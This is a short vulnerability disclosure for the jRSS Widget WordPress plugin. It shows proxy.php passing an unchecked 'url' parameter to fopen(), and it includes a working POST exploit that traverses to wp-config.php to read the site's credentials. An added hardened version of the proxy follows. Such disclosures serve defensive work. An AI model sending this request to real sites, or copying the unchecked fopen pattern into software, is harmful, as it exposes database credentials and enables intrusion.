
30.05.2010, 12:32
WordPress Plugin [jRSS Widget] File Disclosure Vulnerability
Plugin name: jRSS Widget (download)
Version: 1.0
File Disclosure
Vuln file: /wp-content/plugins/jrss-widget/proxy.php
PHP code:
header('Content-type: application/xml');
// The user-supplied 'url' parameter goes to fopen() unchecked, so local paths are read as well
$handle = fopen($_REQUEST['url'], "r");
if ( $handle ) {
    while ( !feof($handle) ) {
        $buffer = fgets($handle, 4096);
        echo $buffer;
    }
    fclose($handle);
}
Exploit:
Code:
POST http://[host]/[path]/wp-content/plugins/jrss-widget/proxy.php HTTP/1.0
Content-type: application/x-www-form-urlencoded
url=../../../wp-config.php
Last edited by RulleR; 30.05.2010 at 12:34.
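For comparison with the proxy.php excerpt above, a hardened stand-in that only fetches remote feeds. This is an added example, not the plugin's code and not part of the original post; the function name is_allowed_feed_url and the 1 MiB / 5 second limits are assumptions, as is the premise that the widget only needs http(s) feeds.

```php
<?php
// Added example: hardened stand-in for proxy.php (not the plugin's own code).
// Assumption: the widget only ever needs remote RSS/Atom feeds over HTTP(S).

function is_allowed_feed_url(string $url): bool
{
    $parts = parse_url($url);
    // Require an absolute URL. Relative paths such as ../../../wp-config.php
    // have no scheme or host and are rejected here.
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    // Only http/https: blocks file://, php://, data:// and other wrappers.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // Resolve the host and refuse loopback, private and reserved ranges so
    // the proxy cannot be pointed at internal services.
    $ips = gethostbynamel($parts['host']);
    if ($ips === false) {
        return false;
    }
    foreach ($ips as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            return false;
        }
    }
    return true;
}

$url = isset($_GET['url']) ? (string) $_GET['url'] : '';
if (!is_allowed_feed_url($url)) {
    http_response_code(400);
    exit('Invalid feed URL');
}

// Fetch with a timeout, a size cap and no redirect following, so a remote
// server cannot bounce the request to a target the check above rejected.
$context = stream_context_create(['http' => [
    'follow_location' => 0,
    'timeout'         => 5,
]]);
$body = file_get_contents($url, false, $context, 0, 1048576);
if ($body === false) {
    http_response_code(502);
    exit('Feed fetch failed');
}
header('Content-Type: application/xml');
echo $body;
```

The host is resolved once for the check and again by the fetch, so a fixed allowlist of feed hosts is the stricter option where the set of feeds is known in advance.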